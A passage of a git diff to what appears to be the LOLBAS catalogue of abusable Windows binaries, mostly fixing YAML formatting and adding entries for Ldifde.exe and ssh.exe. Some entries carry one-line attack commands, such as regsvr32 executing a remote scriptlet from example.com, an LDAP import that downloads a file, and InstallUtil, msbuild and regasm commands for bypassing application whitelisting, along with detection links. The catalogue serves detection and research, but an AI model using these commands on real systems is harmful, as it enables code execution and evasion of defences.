@ -20,4 +20,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Acknowledgement:
|
||||
Handle: '@VakninHai'
|
||||
- Person: Lior Adar
|
||||
Handle:
|
||||
---
|
||||
|
@ -15,7 +15,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
@ -24,7 +24,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
|
||||
@ -39,4 +39,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
|
30
yml/OSBinaries/Ldifde.yml
Normal file
30
yml/OSBinaries/Ldifde.yml
Normal file
@ -0,0 +1,30 @@
|
||||
---
|
||||
Name: Ldifde.exe
|
||||
Description: Creates, modifies, and deletes LDAP directory objects.
|
||||
Author: 'Grzegorz Tworek'
|
||||
Created: 2022-08-31
|
||||
Commands:
|
||||
- Command: Ldifde -i -f inputfile.ldf
|
||||
Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: Administrator
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows Server with AD Domain Services role, Windows 10 with AD LDS role.
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ldifde.exe
|
||||
- Path: c:\windows\syswow64\ldifde.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- Analysis:
|
||||
- Sigma:
|
||||
- Elastic:
|
||||
- Splunk:
|
||||
- BlockRule:
|
||||
Resources:
|
||||
- Link: https://twitter.com/0gtweet/status/1564968845726580736
|
||||
Acknowledgement:
|
||||
- Person: Grzegorz Tworek
|
||||
Handle: '@0gtweet'
|
@ -40,4 +40,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
||||
Handle: '@gN3mes1s'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -56,4 +56,3 @@ Acknowledgement:
|
||||
Handle: '@FortyNorthSec'
|
||||
- Person: Bank Security
|
||||
Handle: '@Bank_Security'
|
||||
---
|
||||
|
@ -22,7 +22,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
|
||||
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle: '@bohops'
|
||||
- Person: clem
|
||||
Handle: '@clavoillotte'
|
||||
---
|
||||
|
@ -53,4 +53,3 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Cedric
|
||||
Handle: '@th3c3dr1c'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
Usecase: Compile and run code
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
@ -78,4 +78,3 @@ Acknowledgement:
|
||||
Handle: '@Cneelis'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -14,7 +14,7 @@ Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
Usecase: Execute code bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -69,4 +69,3 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -51,4 +51,3 @@ Acknowledgement:
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
|
@ -19,4 +19,3 @@ Detection:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -21,4 +21,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -38,4 +38,3 @@ Acknowledgement:
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: '@0rbz_'
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Derek Johnson
|
||||
Handle: ''
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Acknowledgement:
|
||||
Handle: '@LuxNoBulIshit'
|
||||
- Person: Avihay eldad
|
||||
Handle: '@aloneliassaf'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -40,4 +40,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -28,4 +28,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Leon Rodenko
|
||||
Handle: '@L3m0nada'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: FireEye
|
||||
Handle: '@FireEye'
|
||||
---
|
||||
|
@ -41,4 +41,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Grzegorz Tworek
|
||||
Handle: '@0gtweet'
|
||||
---
|
@ -36,4 +36,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
@ -38,4 +38,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
Handle: '@elisalem9'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
|
@ -14,8 +14,8 @@ Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
Category: AWL Bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -7,14 +7,14 @@ Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
@ -57,4 +57,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: elceef
|
||||
Handle: '@elceef'
|
||||
---
|
||||
|
@ -39,4 +39,3 @@ Acknowledgement:
|
||||
Handle: '@splinter_code'
|
||||
- Person: ap
|
||||
Handle: '@decoder_it'
|
||||
---
|
||||
|
@ -80,6 +80,7 @@ Resources:
|
||||
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
||||
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
||||
- Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
|
||||
- Link: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
@ -91,4 +92,3 @@ Acknowledgement:
|
||||
Handle: '@404death'
|
||||
- Person: Martin Ingesen
|
||||
Handle: '@Mrtn9'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Description: Execute target PowerShell script
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Scriptrunner.exe
|
||||
Description:
|
||||
Description: Execute binary through proxy binary to evade defensive counter measures
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@nicktyrer'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle: '@hexacorn'
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
27
yml/OSBinaries/Ssh.yml
Normal file
27
yml/OSBinaries/Ssh.yml
Normal file
@ -0,0 +1,27 @@
|
||||
---
|
||||
Name: ssh.exe
|
||||
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
|
||||
Author: 'Akshat Pradhan'
|
||||
Created: '2021-11-08'
|
||||
Commands:
|
||||
- Command: ssh localhost calc.exe
|
||||
Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
|
||||
Usecase: Execute specified command, can be used for defense evasion.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10 1809, Windows Server 2019
|
||||
- Command: ssh localhost calc.exe
|
||||
Description: Executes calc.exe.
|
||||
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 1809, Windows Server 2019
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\OpenSSH\ssh.exe
|
||||
Detection:
|
||||
- IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
|
||||
- IOC: command line arguments specifying execution.
|
||||
Acknowledgement:
|
||||
- Person: Akshat Pradhan
|
@ -22,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eral4m
|
||||
Handle: '@eral4m'
|
||||
---
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user